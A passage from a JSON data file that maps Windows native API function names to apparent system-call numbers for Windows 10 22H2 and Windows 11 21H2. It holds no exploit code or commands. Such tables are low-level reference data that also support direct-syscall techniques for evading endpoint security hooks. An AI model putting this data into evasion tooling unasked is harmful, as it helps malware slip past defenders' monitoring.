\"NtQueryInformationToken\": 33, \"NtQueryInformationTransaction\": 333, \"NtQueryInformationTransactionManager\": 334, \"NtQueryInformationWorkerFactory\": 335, \"NtQueryInstallUILanguage\": 262480, \"NtQueryIntervalProfile\": 328017, \"NtQueryIoCompletion\": 338, \"NtQueryKey\": 22, \"NtQueryLicenseValue\": 339, \"NtQueryMultipleValueKey\": 340, \"NtQueryMutant\": 341, \"NtQueryObject\": 16, \"NtQueryOpenSubKeys\": 342, \"NtQueryOpenSubKeysEx\": 343, \"NtQueryPerformanceCounter\": 327729, \"NtQueryPortInformationProcess\": 65880, \"NtQueryQuotaInformationFile\": 345, \"NtQuerySection\": 81, \"NtQuerySecurityAttributesToken\": 346, \"NtQuerySecurityObject\": 347, \"NtQuerySecurityPolicy\": 348, \"NtQuerySemaphore\": 349, \"NtQuerySymbolicLinkObject\": 350, \"NtQuerySystemEnvironmentValue\": 351, \"NtQuerySystemEnvironmentValueEx\": 352, \"NtQuerySystemInformation\": 54, \"NtQuerySystemInformationEx\": 353, \"NtQueryTimer\": 56, \"NtQueryTimerResolution\": 655714, \"NtQueryValueKey\": 23, \"NtQueryVirtualMemory\": 35, \"NtQueryVolumeInformationFile\": 73, \"NtQueryWnfStateData\": 355, \"NtQueryWnfStateNameInformation\": 356, \"NtQueueApcThread\": 69, \"NtQueueApcThreadEx\": 357, \"NtRaiseException\": 358, \"NtRaiseHardError\": 359, \"NtReadFile\": 1703942, \"NtReadFileScatter\": 1703982, \"NtReadOnlyEnlistment\": 360, \"NtReadRequestData\": 84, \"NtReadVirtualMemory\": 63, \"NtRecoverEnlistment\": 361, \"NtRecoverResourceManager\": 362, \"NtRecoverTransactionManager\": 363, \"NtRegisterProtocolAddressInformation\": 364, \"NtRegisterThreadTerminatePort\": 196973, \"NtReleaseKeyedEvent\": 1311086, \"NtReleaseMutant\": 458784, \"NtReleaseSemaphore\": 786442, \"NtReleaseWorkerFactoryWorker\": 196975, \"NtRemoveIoCompletion\": 1835017, \"NtRemoveIoCompletionEx\": 368, \"NtRenameKey\": 370, \"NtRenameTransactionManager\": 371, \"NtReplaceKey\": 372, \"NtReplacePartitionUnit\": 373, \"NtReplyPort\": 12, \"NtReplyWaitReceivePort\": 11, \"NtReplyWaitReceivePortEx\": 43, \"NtReplyWaitReplyPort\": 374, \"NtRequestPort\": 375, \"NtRequestWaitReplyPort\": 34, \"NtResetEvent\": 459128, \"NtResetWriteWatch\": 786809, \"NtRestoreKey\": 378, \"NtResumeProcess\": 196987, \"NtResumeThread\": 458834, \"NtRevertContainerImpersonation\": 380, \"NtRollbackComplete\": 381, \"NtRollbackEnlistment\": 382, \"NtRollbackRegistryTransaction\": 383, \"NtRollbackTransaction\": 384, \"NtRollforwardTransactionManager\": 385, \"NtSaveKey\": 524674, \"NtSaveKeyEx\": 917891, \"NtSaveMergedKeys\": 721284, \"NtSecureConnectPort\": 389, \"NtSerializeBoot\": 390, \"NtSetBootEntryOrder\": 391, \"NtSetBootOptions\": 392, \"NtSetCachedSigningLevel\": 393, \"NtSetCachedSigningLevel2\": 394, \"NtSetContextThread\": 395, \"NtSetDebugFilterState\": 655756, \"NtSetDefaultHardErrorPort\": 197005, \"NtSetDefaultLocale\": 328078, \"NtSetDefaultUILanguage\": 262543, \"NtSetDriverEntryOrder\": 400, \"NtSetEaFile\": 401, \"NtSetEvent\": 458766, \"NtSetEventBoostPriority\": 196653, \"NtSetHighEventPair\": 197010, \"NtSetHighWaitLowEventPair\": 197011, \"NtSetIRTimer\": 459156, \"NtSetInformationDebugObject\": 405, \"NtSetInformationEnlistment\": 406, \"NtSetInformationFile\": 39, \"NtSetInformationJobObject\": 407, \"NtSetInformationKey\": 408, \"NtSetInformationObject\": 92, \"NtSetInformationProcess\": 28, \"NtSetInformationResourceManager\": 409, \"NtSetInformationSymbolicLink\": 410, \"NtSetInformationThread\": 13, \"NtSetInformationToken\": 411, \"NtSetInformationTransaction\": 412, \"NtSetInformationTransactionManager\": 413, \"NtSetInformationVirtualMemory\": 414, \"NtSetInformationWorkerFactory\": 415, \"NtSetIntervalProfile\": 328096, \"NtSetIoCompletion\": 417, \"NtSetIoCompletionEx\": 418, \"NtSetLdtEntries\": 419, \"NtSetLowEventPair\": 197028, \"NtSetLowWaitHighEventPair\": 197029, \"NtSetQuotaInformationFile\": 422, \"NtSetSecurityObject\": 423, \"NtSetSystemEnvironmentValue\": 424, \"NtSetSystemEnvironmentValueEx\": 425, \"NtSetSystemInformation\": 426, \"NtSetSystemPowerState\": 427, \"NtSetSystemTime\": 328108, \"NtSetThreadExecutionState\": 328109, \"NtSetTimer\": 98, \"NtSetTimer2\": 430, \"NtSetTimerEx\": 431, \"NtSetTimerResolution\": 655792, \"NtSetUuidSeed\": 262577, \"NtSetValueKey\": 96, \"NtSetVolumeInformationFile\": 434, \"NtSetWnfProcessNotificationEvent\": 435, \"NtShutdownSystem\": 262580, \"NtShutdownWorkerFactory\": 437, \"NtSignalAndWaitForSingleObject\": 1245622, \"NtSinglePhaseReject\": 439, \"NtStartProfile\": 197048, \"NtStopProfile\": 197049, \"NtSubscribeWnfStateChange\": 442, \"NtSuspendProcess\": 197051, \"NtSuspendThread\": 459196, \"NtSystemDebugControl\": 445, \"NtTerminateEnclave\": 446, \"NtTerminateJobObject\": 459199, \"NtTerminateProcess\": 458796, \"NtTerminateThread\": 458835, \"NtTestAlert\": 131520, \"NtThawRegistry\": 449, \"NtThawTransactions\": 450, \"NtTraceControl\": 451, \"NtTraceEvent\": 94, \"NtTranslateFilePath\": 1114564, \"NtUmsThreadYield\": 453, \"NtUnloadDriver\": 454, \"NtUnloadKey\": 455, \"NtUnloadKey2\": 456, \"NtUnloadKeyEx\": 457, \"NtUnlockFile\": 458, \"NtUnlockVirtualMemory\": 459, \"NtUnmapViewOfSection\": 42, \"NtUnmapViewOfSectionEx\": 460, \"NtUnsubscribeWnfStateChange\": 461, \"NtUpdateWnfStateData\": 462, \"NtVdmControl\": 463, \"NtWaitForAlertByThreadId\": 393680, \"NtWaitForDebugEvent\": 465, \"NtWaitForKeyedEvent\": 1376722, \"NtWaitForMultipleObjects\": 1900635, \"NtWaitForMultipleObjects32\": 1966106, \"NtWaitForSingleObject\": 851972, \"NtWaitForWorkViaWorkerFactory\": 467, \"NtWaitHighEventPair\": 197076, \"NtWaitLowEventPair\": 197077, \"NtWorkerFactoryWorkerReady\": 196609, \"NtWriteFile\": 1703944, \"NtWriteFileGather\": 1703963, \"NtWriteRequestData\": 87, \"NtWriteVirtualMemory\": 58, \"NtYieldExecution\": 65606}, \"22h2\": {\"NtWorkerFactoryWorkerReady\": 196609, \"NtMapUserPhysicalPagesScatter\": 655363, \"NtWaitForMultipleObjects32\": 1966106, \"NtReplyWaitReceivePortEx\": 43, \"NtQueryDefaultUILanguage\": 262212, \"NtApphelpCacheControl\": 76, \"NtCreateProcessEx\": 77, \"NtIsProcessInJob\": 524367, \"NtAccessCheckByTypeAndAuditAlarm\": 89, \"NtTraceEvent\": 94, \"NtPowerInformation\": 95, \"NtAccessCheckByType\": 99, \"NtAccessCheckByTypeResultList\": 100, \"NtAccessCheckByTypeResultListAndAuditAlarm\": 101, \"NtAccessCheckByTypeResultListAndAuditAlarmByHandle\": 102, \"NtAddAtomEx\": 1114217, \"NtAddBootEntry\": 106, \"NtAddDriverEntry\": 107, \"NtAdjustTokenClaimsAndDeviceGroups\": 109, \"NtAlertThreadByThreadId\": 262256, \"NtAllocateReserveObject\": 114, \"NtGetNextProcess\": 247, \"NtGetNextThread\": 248, \"NtQueueApcThreadEx\": 357, \"NtUmsThreadYield\": 453, \"NtAllocateUserPhysicalPages\": 115, \"NtAllocateVirtualMemoryEx\": 118, \"NtAlpcAcceptConnectPort\": 119, \"NtAlpcCancelMessage\": 120, \"NtAlpcCreatePort\": 123, \"NtAlpcCreatePortSection\": 124, \"NtAlpcCreateResourceReserve\": 125, \"NtAlpcCreateSectionView\": 126, \"NtAlpcCreateSecurityContext\": 127, \"NtAlpcDeletePortSection\": 128, \"NtAlpcDeleteResourceReserve\": 129, \"NtAlpcDeleteSectionView\": 130, \"NtAlpcDeleteSecurityContext\": 131, \"NtAlpcDisconnectPort\": 132, \"NtAlpcImpersonateClientOfPort\": 134, \"NtAlpcOpenSenderProcess\": 135, \"NtAlpcOpenSenderThread\": 136, \"NtAlpcQueryInformation\": 137, \"NtAlpcQueryInformationMessage\": 138, \"NtAlpcRevokeSecurityContext\": 139, \"NtAlpcSendWaitReceivePort\": 140, \"NtAlpcSetInformation\": 141, \"NtEnumerateBootEntries\": 222, \"NtEnumerateDriverEntries\": 223, \"NtEnumerateSystemEnvironmentValuesEx\": 224, \"NtQueryBootEntryOrder\": 319, \"NtQueryBootOptions\": 320, \"NtQueryDriverEntryOrder\": 324, \"NtQuerySystemEnvironmentValueEx\": 352, \"NtSetBootEntryOrder\": 391, \"NtSetDriverEntryOrder\": 400, \"NtQuerySystemInformationEx\": 353, \"NtInitializeNlsFiles\": 255, \"NtCreateProfileEx\": 187, \"NtCreateWorkerFactory\": 204, \"NtFlushInstallUILanguage\": 231, \"NtGetMUIRegistryInfo\": 246, \"NtGetNlsSectionPtr\": 249, \"NtIsUILanguageComitted\": 259, \"NtReleaseWorkerFactoryWorker\": 196975, \"NtQueryInformationWorkerFactory\": 335, \"NtSetInformationWorkerFactory\": 415, \"NtWaitForWorkViaWorkerFactory\": 467, \"NtShutdownWorkerFactory\": 437, \"NtSetTimerEx\": 431, \"NtCancelTimer2\": 148, \"NtSetTimer2\": 430, \"NtQueryWnfStateData\": 355, \"NtUpdateWnfStateData\": 462, \"NtDisableLastKnownGood\": 218, \"NtEnableLastKnownGood\": 221, \"NtCancelSynchronousIoFile\": 147, \"NtSetIoCompletion\": 417, \"NtSetIoCompletionEx\": 418, \"NtRemoveIoCompletionEx\": 368, \"NtNotifyChangeSession\": 283, \"NtAssociateWaitCompletionPacket\": 144, \"NtFlushProcessWriteBuffers\": 234, \"NtCommitComplete\": 150, \"NtCommitEnlistment\": 151, \"NtCommitTransaction\": 153, \"NtCreateEnlistment\": 169, \"NtCreateResourceManager\": 189, \"NtCreateTransaction\": 198, \"NtCreateTransactionManager\": 199, \"NtEnumerateTransactionObject\": 225, \"NtFreezeTransactions\": 239, \"NtGetNotificationResourceManager\": 250, \"NtOpenEnlistment\": 284, \"NtOpenResourceManager\": 298, \"NtOpenTransaction\": 304, \"NtOpenTransactionManager\": 305, \"NtPrepareComplete\": 309, \"NtPrepareEnlistment\": 310, \"NtPrePrepareComplete\": 307, \"NtPrePrepareEnlistment\": 308, \"NtPropagationComplete\": 314, \"NtPropagationFailed\": 315, \"NtQueryInformationEnlistment\": 329, \"NtQueryInformationResourceManager\": 332, \"NtQueryInformationTransaction\": 333, \"NtQueryInformationTransactionManager\": 334, \"NtReadOnlyEnlistment\": 360, \"NtRecoverEnlistment\": 361, \"NtRecoverResourceManager\": 362, \"NtRecoverTransactionManager\": 363, \"NtRegisterProtocolAddressInformation\": 364, \"NtRenameTransactionManager\": 371, \"NtRollbackComplete\": 381, \"NtRollbackEnlistment\": 382, \"NtRollbackTransaction\": 384, \"NtRollforwardTransactionManager\": 385, \"NtSetInformationEnlistment\": 406, \"NtSetInformationResourceManager\": 409, \"NtSetInformationTransaction\": 412, \"NtSetInformationTransactionManager\": 413, \"NtSinglePhaseReject\": 439, \"NtThawRegistry\": 449, \"NtThawTransactions\": 450, \"NtDrawText\": 220, \"NtTraceControl\": 451, \"NtSetWnfProcessNotificationEvent\": 435, \"NtSetInformationVirtualMemory\": 414, \"NtOpenPrivateNamespace\": 295, \"NtCreatePrivateNamespace\": 184, \"NtDeletePrivateNamespace\": 213, \"NtReplacePartitionUnit\": 373, \"NtSerializeBoot\": 390, \"NtOpenKeyTransacted\": 289, \"NtOpenKeyTransactedEx\": 290, \"NtFreezeRegistry\": 238, \"NtCreateKeyTransacted\": 175, \"NtQuerySecurityAttributesToken\": 346, \"NtWow64CallFunction64\": 488, \"NtWow64WriteVirtualMemory64\": 487, \"NtAlpcConnectPortEx\": 122, \"NtAlpcImpersonateClientContainerOfPort\": 133, \"NtAreMappedFilesTheSame\": 327822, \"NtAssignProcessToJobObject\": 524431, \"NtCreateJobSet\": 174, \"NtCreateJobObject\": 173, \"NtOpenJobObject\": 287, \"NtQueryInformationJobObject\": 330, \"NtSetInformationJobObject\": 407, \"NtTerminateJobObject\": 459199, \"NtCallEnclave\": 145, \"NtTerminateEnclave\": 446, \"NtInitializeEnclave\": 254, \"NtCreateEnclave\": 168, \"NtLoadEnclaveData\": 262, \"NtCreateSectionEx\": 190, \"NtMapViewOfSectionEx\": 276, \"NtUnmapViewOfSectionEx\": 460, \"NtCreatePartition\": 182, \"NtOpenPartition\": 294, \"NtManagePartition\": 273, \"NtMapUserPhysicalPages\": 655635, \"NtAllocateUserPhysicalPagesEx\": 116, \"NtGetWriteWatch\": 251, \"NtResetWriteWatch\": 786809, \"NtCreatePagingFile\": 181, \"NtCancelIoFileEx\": 146, \"NtCancelWaitCompletionPacket\": 149, \"NtCreateWaitCompletionPacket\": 201, \"NtCompareObjects\": 155, \"NtCompareTokens\": 157, \"NtContinueEx\": 161, \"NtCreateCrossVmEvent\": 163, \"NtCreateCrossVmMutant\": 164, \"NtCreateDirectoryObjectEx\": 167, \"NtCreateIRTimer\": 171, \"NtCreateLowBoxToken\": 177, \"NtCreateRegistryTransaction\": 188, \"NtCreateThreadEx\": 193, \"NtCreateTimer2\": 195, \"NtCreateTokenEx\": 197, \"NtCreateUserProcess\": 200, \"NtCreateWaitablePort\": 202, \"NtCreateWnfStateName\": 203, \"NtDebugContinue\": 206, \"NtDeleteBootEntry\": 208, \"NtDeleteDriverEntry\": 209, \"NtDeleteWnfStateData\": 215, \"NtDeleteWnfStateName\": 216, \"NtDirectGraphicsCall\": 217, \"NtFilterBootOption\": 227, \"NtFilterToken\": 228, \"NtFilterTokenEx\": 229, \"NtGetCachedSigningLevel\": 240, \"NtGetCompleteWnfStateSubscription\": 241, \"NtGetContextThread\": 242, \"NtGetCurrentProcessorNumber\": 1638643, \"NtGetCurrentProcessorNumberEx\": 244, \"NtGetDevicePowerState\": 458997, \"NtImpersonateAnonymousToken\": 196860, \"NtInitializeRegistry\": 256, \"NtInitiatePowerAction\": 1114369, \"NtIsSystemResumeAutomatic\": 65794, \"NtLoadKeyEx\": 265, \"NtLockProductActivationKeys\": 327947, \"NtLockRegistryKey\": 196876, \"NtMakePermanentObject\": 196878, \"NtManageHotPatch\": 272, \"NtMapCMFModule\": 274, \"NtModifyBootEntry\": 277, \"NtModifyDriverEntry\": 278, \"NtNotifyChangeDirectoryFileEx\": 280, \"NtNotifyChangeMultipleKeys\": 282, \"NtOpenKeyEx\": 288, \"NtOpenKeyedEvent\": 291, \"NtOpenRegistryTransaction\": 297, \"NtPlugPlayControl\": 306, \"NtPssCaptureVaSpaceBulk\": 316, \"NtQueryAuxiliaryCounterFrequency\": 318, \"NtQueryDebugFilterState\": 328001, \"NtQueryInformationByName\": 328, \"NtQueryInstallUILanguage\": 262480, \"NtQueryLicenseValue\": 339, \"NtQueryOpenSubKeys\": 342, \"NtQueryOpenSubKeysEx\": 343, \"NtQueryPortInformationProcess\": 65880, \"NtQuerySecurityPolicy\": 348, \"NtQueryWnfStateNameInformation\": 356, \"NtRenameKey\": 370, \"NtResumeProcess\": 196987, \"NtRevertContainerImpersonation\": 380, \"NtRollbackRegistryTransaction\": 383, \"NtSaveKeyEx\": 917891, \"NtSaveMergedKeys\": 721284, \"NtSecureConnectPort\": 389, \"NtSetBootOptions\": 392, \"NtSetCachedSigningLevel\": 393, \"NtSetCachedSigningLevel2\": 394, \"NtSetContextThread\": 395, \"NtSetDebugFilterState\": 655756, \"NtSetDefaultUILanguage\": 262543, \"NtSetIRTimer\": 459156, \"NtSetInformationDebugObject\": 405, \"NtSetInformationSymbolicLink\": 410, \"NtSetLdtEntries\": 419, \"NtSetSystemEnvironmentValueEx\": 425, \"NtSetSystemPowerState\": 427, \"NtSetThreadExecutionState\": 328109, \"NtSetUuidSeed\": 262577, \"NtSubscribeWnfStateChange\": 442, \"NtSuspendProcess\": 197051, \"NtTranslateFilePath\": 1114564, \"NtUnloadKey2\": 456, \"NtUnloadKeyEx\": 457, \"NtUnsubscribeWnfStateChange\": 461, \"NtVdmControl\": 463, \"NtWaitForAlertByThreadId\": 393680, \"NtWaitForDebugEvent\": 465, \"NtLoadKey3\": 470, \"NtAlpcConnectPort\": 121, \"NtFreeUserPhysicalPages\": 237, \"KiUserApcDispatcher\": 0, \"NtAlertThread\": 196719, \"NtCallbackReturn\": 5, \"NtQueueApcThread\": 69, \"NtTestAlert\": 131520, \"NtAddAtom\": 655431, \"NtDeleteAtom\": 262351, \"NtFindAtom\": 655380, \"NtQueryInformationAtom\": 327, \"NtSystemDebugControl\": 445, \"NtDisplayString\": 219, \"NtRaiseException\": 358, \"NtRaiseHardError\": 359, \"NtSetDefaultHardErrorPort\": 197005, \"NtQuerySystemEnvironmentValue\": 351, \"NtSetSystemEnvironmentValue\": 424, \"NtLoadDriver\": 261, \"NtUnloadDriver\": 454, \"NtFlushWriteBuffer\": 65772, \"NtShutdownSystem\": 262580, \"NtQueryDefaultLocale\": 327701, \"NtSetDefaultLocale\": 328078, \"NtAllocateVirtualMemory\": 24, \"NtFlushVirtualMemory\": 235, \"NtFreeVirtualMemory\": 30, \"NtLockVirtualMemory\": 269, \"NtProtectVirtualMemory\": 80, \"NtQueryVirtualMemory\": 35, \"NtReadVirtualMemory\": 63, \"NtUnlockVirtualMemory\": 459, \"NtWriteVirtualMemory\": 58, \"NtQuerySecurityObject\": 347, \"NtSetSecurityObject\": 423, \"NtDuplicateObject\": 60, \"NtMakeTemporaryObject\": 196879, \"NtQueryObject\": 16, \"NtSetInformationObject\": 92, \"NtSignalAndWaitForSingleObject\": 1245622, \"NtWaitForMultipleObjects\": 1900635, \"NtWaitForSingleObject\": 851972, \"NtCreateDebugObject\": 165, \"NtDebugActiveProcess\": 524493, \"NtRemoveProcessDebug\": 524657, \"NtCreateDirectoryObject\": 166, \"NtOpenDirectoryObject\": 88, \"NtQueryDirectoryObject\": 323, \"NtClearEvent\": 196670, \"NtCreateEvent\": 72, \"NtOpenEvent\": 64, \"NtPulseEvent\": 459069, \"NtQueryEvent\": 86, \"NtResetEvent\": 459128, \"NtSetEvent\": 458766, \"NtSetEventBoostPriority\": 196653, \"NtCreateEventPair\": 170, \"NtOpenEventPair\": 285, \"NtSetHighEventPair\": 197010, \"NtSetHighWaitLowEventPair\": 197011, \"NtSetLowEventPair\": 197028, \"NtSetLowWaitHighEventPair\": 197029, \"NtWaitHighEventPair\": 197076, \"NtWaitLowEventPair\": 197077, \"NtCancelIoFile\": 93, \"NtCreateFile\": 85, \"NtCreateMailslotFile\": 178, \"NtCreateNamedPipeFile\": 180, \"NtDeleteFile\": 210, \"NtDeviceIoControlFile\": 1769479, \"NtFlushBuffersFile\": 75, \"NtFsControlFile\": 1769529, \"NtLockFile\": 266, \"NtNotifyChangeDirectoryFile\": 279, \"NtOpenFile\": 51, \"NtQueryAttributesFile\": 61, \"NtQueryDirectoryFile\": 53, \"NtQueryEaFile\": 325, \"NtQueryFullAttributesFile\": 326, \"NtQueryInformationFile\": 17, \"NtQueryVolumeInformationFile\": 73, \"NtReadFile\": 1703942, \"NtReadFileScatter\": 1703982, \"NtSetEaFile\": 401, \"NtSetInformationFile\": 39, \"NtSetVolumeInformationFile\": 434, \"NtUnlockFile\": 458, \"NtWriteFile\": 1703944, \"NtWriteFileGather\": 1703963, \"NtCreateIoCompletion\": 172, \"NtOpenIoCompletion\": 286, \"NtQueryIoCompletion\": 338, \"NtRemoveIoCompletion\": 1835017, \"NtCompactKeys\": 154, \"NtCompressKey\": 196767, \"NtCreateKey\": 29, \"NtDeleteKey\": 211, \"NtDeleteValueKey\": 214, \"NtEnumerateKey\": 50, \"NtEnumerateValueKey\": 19, \"NtFlushKey\": 196841, \"NtLoadKey\": 263, \"NtLoadKey2\": 264, \"NtNotifyChangeKey\": 281, \"NtOpenKey\": 18, \"NtQueryKey\": 22, \"NtQueryMultipleValueKey\": 340, \"NtQueryValueKey\": 23, \"NtReplaceKey\": 372, \"NtRestoreKey\": 378, \"NtSaveKey\": 524674, \"NtSetInformationKey\": 408, \"NtSetValueKey\": 96, \"NtUnloadKey\": 455, \"NtCreateKeyedEvent\": 176, \"NtReleaseKeyedEvent\": 1311086, \"NtWaitForKeyedEvent\": 1376722, \"NtCreateMutant\": 179, \"NtOpenMutant\": 292, \"NtQueryMutant\": 341, \"NtReleaseMutant\": 458784, \"NtAcceptConnectPort\": 2, \"NtCompleteConnectPort\": 158, \"NtConnectPort\": 160, \"NtCreatePort\": 183, \"NtImpersonateClientOfPort\": 458783, \"NtListenPort\": 260, \"NtQueryInformationPort\": 331, \"NtReadRequestData\": 84, \"NtReplyPort\": 12, \"NtReplyWaitReceivePort\": 11, \"NtReplyWaitReplyPort\": 374, \"NtRequestPort\": 375, \"NtRequestWaitReplyPort\": 34, \"NtWriteRequestData\": 87, \"NtCreateProcess\": 185, \"NtFlushInstructionCache\": 786664, \"NtOpenProcess\": 38, \"NtQueryInformationProcess\": 25, \"NtSetInformationProcess\": 28, \"NtTerminateProcess\": 458796, \"NtCreateProfile\": 186, \"NtQueryIntervalProfile\": 328017, \"NtSetIntervalProfile\": 328096, \"NtStartProfile\": 197048, \"NtStopProfile\": 197049, \"NtCreateSection\": 74, \"NtExtendSection\": 226, \"NtMapViewOfSection\": 40, \"NtOpenSection\": 55, \"NtQuerySection\": 81, \"NtUnmapViewOfSection\": 42, \"NtCreateSemaphore\": 191, \"NtOpenSemaphore\": 299, \"NtQuerySemaphore\": 349, \"NtReleaseSemaphore\": 786442, \"NtCreateSymbolicLinkObject\": 192, \"NtOpenSymbolicLinkObject\": 301, \"NtQuerySymbolicLinkObject\": 350, \"NtAlertResumeThread\": 458862, \"NtContinue\": 67, \"NtCreateThread\": 78, \"NtDelayExecution\": 393268, \"NtImpersonateThread\": 253, \"NtOpenThread\": 302, \"NtQueryInformationThread\": 37, \"NtRegisterThreadTerminatePort\": 196973, \"NtResumeThread\": 458834, \"NtSetInformationThread\": 13, \"NtSuspendThread\": 459196, \"NtTerminateThread\": 458835, \"NtYieldExecution\": 65606, \"NtCancelTimer\": 458849, \"NtCreateTimer\": 194, \"NtOpenTimer\": 303, \"NtQueryTimer\": 56, \"NtSetTimer\": 98, \"NtAdjustGroupsToken\": 108, \"NtAdjustPrivilegesToken\": 65, \"NtCreateToken\": 196, \"NtDuplicateToken\": 66, \"NtOpenProcessToken\": 296, \"NtOpenThreadToken\": 36, \"NtQueryInformationToken\": 33, \"NtSetInformationToken\": 411, \"NtAccessCheckAndAuditAlarm\": 41, \"NtCloseObjectAuditAlarm\": 59, \"NtDeleteObjectAuditAlarm\": 212, \"NtOpenObjectAuditAlarm\": 293, \"NtPrivilegeObjectAuditAlarm\": 312, \"NtPrivilegedServiceAuditAlarm\": 313, \"NtAccessCheck\": 0, \"NtAllocateLocallyUniqueId\": 262257, \"NtAllocateUuids\": 1114229, \"NtPrivilegeCheck\": 786743, \"NtQuerySystemInformation\": 54, \"NtSetSystemInformation\": 426, \"NtQueryPerformanceCounter\": 327729, \"NtQuerySystemTime\": 1572954, \"NtQueryTimerResolution\": 655714, \"NtSetSystemTime\": 328108, \"NtSetTimerResolution\": 655792, \"NtClose\": 196623, \"NtFlushBuffersFileEx\": 230, \"NtOpenProcessTokenEx\": 48, \"NtOpenThreadTokenEx\": 47, \"NtQueryDirectoryFileEx\": 322, \"NtQueryQuotaInformationFile\": 345, \"NtSetQuotaInformationFile\": 422}}, \"Windows 11\": {\"21h2\": {\"NtAccessCheck\": 0, \"NtAccessCheckAndAuditAlarm\": 41, \"NtAccessCheckByType\": 99, \"NtAccessCheckByTypeAndAuditAlarm\": 89, \"NtAccessCheckByTypeResultList\": 100, \"NtAccessCheckByTypeResultListAndAuditAlarm\": 101, \"NtAccessCheckByTypeResultListAndAuditAlarmByHandle\": 102, \"NtAcquireCrossVmMutant\": 103, \"NtAcquireProcessActivityReference\": 104, \"NtAddAtom\": 71, \"NtAddAtomEx\": 1114217, \"NtAddBootEntry\": 106, \"NtAddDriverEntry\": 107, \"NtAdjustGroupsToken\": 108, \"NtAdjustPrivilegesToken\": 65, \"NtAdjustTokenClaimsAndDeviceGroups\": 109, \"NtAlertResumeThread\": 458862, \"NtAlertThread\": 196719, \"NtAlertThreadByThreadId\": 262256, \"NtAllocateLocallyUniqueId\": 262257, \"NtAllocateReserveObject\": 114, \"NtAllocateUserPhysicalPages\": 115, \"NtAllocateUserPhysicalPagesEx\": 116, \"NtAllocateUuids\": 1114229, \"NtAllocateVirtualMemory\": 24, \"NtAllocateVirtualMemoryEx\": 118, \"NtAlpcAcceptConnectPort\": 119, \"NtAlpcCancelMessage\": 120, \"NtAlpcConnectPort\": 121, \"NtAlpcConnectPortEx\": 122, \"NtAlpcCreatePort\": 123, \"NtAlpcCreatePortSection\": 124, \"NtAlpcCreateResourceReserve\": 125, \"NtAlpcCreateSectionView\": 126, \"NtAlpcCreateSecurityContext\": 127, \"NtAlpcDeletePortSection\": 128, \"NtAlpcDeleteResourceReserve\": 129, \"NtAlpcDeleteSectionView\": 130, \"NtAlpcDeleteSecurityContext\": 131, \"NtAlpcDisconnectPort\": 132, \"NtAlpcImpersonateClientContainerOfPort\": 133, \"NtAlpcImpersonateClientOfPort\": 134, \"NtAlpcOpenSenderProcess\": 135, \"NtAlpcOpenSenderThread\": 136, \"NtAlpcQueryInformation\": 137, \"NtAlpcQueryInformationMessage\": 138, \"NtAlpcRevokeSecurityContext\": 139, \"NtAlpcSendWaitReceivePort\": 140, \"NtAlpcSetInformation\": 141, \"NtApphelpCacheControl\": 76, \"NtAreMappedFilesTheSame\": 327822, \"NtAssignProcessToJobObject\": 524431, \"NtAssociateWaitCompletionPacket\": 144, \"NtCallEnclave\": 145, \"NtCallbackReturn\": 5, \"NtCancelIoFile\": 93, \"NtCancelIoFileEx\": 146, \"NtCancelSynchronousIoFile\": 147, \"NtCancelTimer\": 458849, \"NtCancelTimer2\": 148, \"NtCancelWaitCompletionPacket\": 149, \"NtChangeProcessState\": 150, \"NtChangeThreadState\": 151, \"NtClearEvent\": 196670, \"NtClose\": 196671, \"NtCloseObjectAuditAlarm\": 59, \"NtCommitComplete\": 152, \"NtCommitEnlistment\": 153, \"NtCommitRegistryTransaction\": 154, \"NtCommitTransaction\": 155, \"NtCompactKeys\": 156, \"NtCompareObjects\": 157, \"NtCompareSigningLevels\": 158, \"NtCompareTokens\": 159, \"NtCompleteConnectPort\": 160, \"NtCompressKey\": 196769, \"NtConnectPort\": 162, \"NtContinue\": 67, \"NtContinueEx\": 163, \"NtConvertBetweenAuxiliaryCounterAndPerformanceCounter\": 164, \"NtCreateCrossVmEvent\": 165, \"NtCreateCrossVmMutant\": 166, \"NtCreateDebugObject\": 167, \"NtCreateDirectoryObject\": 168, \"NtCreateDirectoryObjectEx\": 169, \"NtCreateEnclave\": 170, \"NtCreateEnlistment\": 171, \"NtCreateEvent\": 72, \"NtCreateEventPair\": 172, \"NtCreateFile\": 85, \"NtCreateIRTimer\": 173, \"NtCreateIoCompletion\": 174, \"NtCreateIoRing\": 175, \"NtCreateJobObject\": 176, \"NtCreateJobSet\": 177, \"NtCreateKey\": 29, \"NtCreateKeyTransacted\": 178, \"NtCreateKeyedEvent\": 179, \"NtCreateLowBoxToken\": 180, \"NtCreateMailslotFile\": 181, \"NtCreateMutant\": 182, \"NtCreateNamedPipeFile\": 183, \"NtCreatePagingFile\": 184, \"NtCreatePartition\": 185, \"NtCreatePort\": 186, \"NtCreatePrivateNamespace\": 187, \"NtCreateProcess\": 188, \"NtCreateProcessEx\": 77, \"NtCreateProcessStateChange\": 189, \"NtCreateProfile\": 190, \"NtCreateProfileEx\": 191, \"NtCreateRegistryTransaction\": 192, \"NtCreateResourceManager\": 193, \"NtCreateSection\": 74, \"NtCreateSectionEx\": 194, \"NtCreateSemaphore\": 195, \"NtCreateSymbolicLinkObject\": 196, \"NtCreateThread\": 78, \"NtCreateThreadEx\": 197, \"NtCreateThreadStateChange\": 198, \"NtCreateTimer\": 199, \"NtCreateTimer2\": 200, \"NtCreateToken\": 201, \"NtCreateTokenEx\": 202, \"NtCreateTransaction\": 203, \"NtCreateTransactionManager\": 204, \"NtCreateUserProcess\": 205, \"NtCreateWaitCompletionPacket\": 206, \"NtCreateWaitablePort\": 207, \"NtCreateWnfStateName\": 208, \"NtCreateWorkerFactory\": 209, \"NtDebugActiveProcess\": 524498, \"NtDebugContinue\": 211, \"NtDelayExecution\": 393268, \"NtDeleteAtom\": 262356, \"NtDeleteBootEntry\": 213, \"NtDeleteDriverEntry\": 214, \"NtDeleteFile\": 215, \"NtDeleteKey\": 216, \"NtDeleteObjectAuditAlarm\": 217, \"NtDeletePrivateNamespace\": 218, \"NtDeleteValueKey\": 219, \"NtDeleteWnfStateData\": 220, \"NtDeleteWnfStateName\": 221, \"NtDeviceIoControlFile\": 1769479, \"NtDirectGraphicsCall\": 222, \"NtDisableLastKnownGood\": 223, \"NtDisplayString\": 224, \"NtDrawText\": 225, \"NtDuplicateObject\": 60, \"NtDuplicateToken\": 66, \"NtEnableLastKnownGood\": 226, \"NtEnumerateBootEntries\": 227, \"NtEnumerateDriverEntries\": 228, \"NtEnumerateKey\": 50, \"NtEnumerateSystemEnvironmentValuesEx\": 229, \"NtEnumerateTransactionObject\": 230, \"NtEnumerateValueKey\": 19, \"NtExtendSection\": 231, \"NtFilterBootOption\": 232, \"NtFilterToken\": 233, \"NtFilterTokenEx\": 234, 